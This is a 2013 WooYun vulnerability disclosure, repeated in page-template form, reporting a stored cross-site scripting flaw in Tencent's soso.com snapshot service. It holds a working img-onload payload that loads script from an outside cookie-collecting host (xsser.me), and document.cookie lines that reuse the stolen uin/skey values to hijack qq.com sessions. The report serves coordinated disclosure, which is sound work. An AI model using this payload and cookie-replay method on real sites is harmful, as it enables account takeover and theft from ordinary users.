名副其实的“跨”站脚本攻击，腾讯snapshot存在安全漏洞（无心插柳柳成荫2）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-016968

漏洞标题：名副其实的“跨”站脚本攻击，腾讯snapshot存在安全漏洞（无心插柳柳成荫2）

漏洞作者： px1624

提交时间：2013-01-05 23:34

修复时间：2013-02-19 23:35

公开时间：2013-02-19 23:35

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-01-05：细节已通知厂商并且等待厂商处理中
2013-01-06：厂商已经确认，细节仅向厂商公开
2013-01-16：细节向核心白帽子及相关领域专家公开
2013-01-26：细节向普通白帽子公开
2013-02-05：细节向实习白帽子公开
2013-02-19：细节向公众公开

简要描述：

XSS了一下大街网，具体可以看 http://www.wooyun.org/bugs/wooyun-2013-016942，莫名其妙的XSS到了百度。看了下，原来是百度的某个功能不安全额。然后就联想到了腾讯，果然不出所料腾讯也中招了。剑心不要说我在刷rank哦。。。

详细说明：

1 都是快照惹的祸，莫名其妙的xss到了百度，就想到腾讯soso，不过腾讯soso的抓数据真心比百度弱好多，等了一天，终于抓到了数据，直接以快照模式打开。

测试地址：

http://snapshot.soso.com/snap.cgi?d=1747679200769378085&w=%A1%BE%BE%AB%BB%AA%A3%AC%BB%F0%A1%BF%D3%D0%CD%BC%D3%D0%D5%E6%CF%E0%A3%AC%B7%C7%C4%E3%C4%AA%CA%F4%CF%D6%B3%A1%A3%AC%B0%D4%C6%F8%CD%FE%CE%E4%A3%AC%B8%F8%C1%A6%B0%A1%A3%A1&u=http://feinimoshu.dajie.com/discuss/topic/162247/detail

2 可以看到域名是腾讯soso的，进入地址后用F12查看，之前在那里插入的恶意代码没有过滤。
代码：

<img src="http://fs3u.dajie.com/2013/01/04/117/13573151176041810m.png" onload="s=document.createElement('script');s.src='http://xsser.me/6Y3Mpn?'+Math.random();document.body.appendChild(s)" border="0">

可以成功盗取登录cookie。

3 如图成功的盗取了soso.com域名下的cookie，并且测试可以登录成功soso，但是由于跨域并不能登录qq.com
观察后发现，soso.com下的skey和qq.com下是一样的，所以只需要写入以下代码就可以了。（可以直接用调试工具执行js代码）

document.cookie="uin=xxx; domain=qq.com";
document.cookie="skey=yyy; domain=qq.com";

其中xxx和yyy可以通过soso下抓到的cookie进行提取。
已测试可以顺利登录qq.com域名下的网站了。
4 同理如果其他站有XSS的话，soso快照还是会中招。可以自己XSS自己网站，然后通过soso快照去XSS腾讯搜搜。可以说是普遍撒网，特殊捞鱼。
5 soso快照中招了，可以用上面方法登录qq.com，既然能登陆qq.com了，就可以想干嘛干嘛了，所以危害可想而知了。

漏洞证明：

http://snapshot.soso.com/snap.cgi?d=1747679200769378085&w=%A1%BE%BE%AB%BB%AA%A3%AC%BB%F0%A1%BF%D3%D0%CD%BC%D3%D0%D5%E6%CF%E0%A3%AC%B7%C7%C4%E3%C4%AA%CA%F4%CF%D6%B3%A1%A3%AC%B0%D4%C6%F8%CD%FE%CE%E4%A3%AC%B8%F8%C1%A6%B0%A1%A3%A1&u=http://feinimoshu.dajie.com/discuss/topic/162247/detail

也不知道你们这soso快照的有效期是多久，原帖我已经通知大街网给删了。。。

修复方案：

过年了，本命年求个礼物冲冲喜。

版权声明：转载请注明来源 px1624@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-01-06 10:29

厂商回复：

非常感谢您的报告。我们会马上安排专人跟进确认处理，有新的情况会及时同步

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-016968

漏洞标题：名副其实的“跨”站脚本攻击，腾讯snapshot存在安全漏洞（无心插柳柳成荫2）

相关厂商：腾讯

漏洞作者： px1624

提交时间：2013-01-05 23:34

修复时间：2013-02-19 23:35

公开时间：2013-02-19 23:35

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 px1624@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-016968

漏洞标题：名副其实的“跨”站脚本攻击，腾讯snapshot存在安全漏洞（无心插柳柳成荫2）

相关厂商：腾讯

漏洞作者： px1624

提交时间：2013-01-05 23:34

修复时间：2013-02-19 23:35

公开时间：2013-02-19 23:35

漏洞类型：xss跨站脚本攻击

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-016968"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 px1624@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：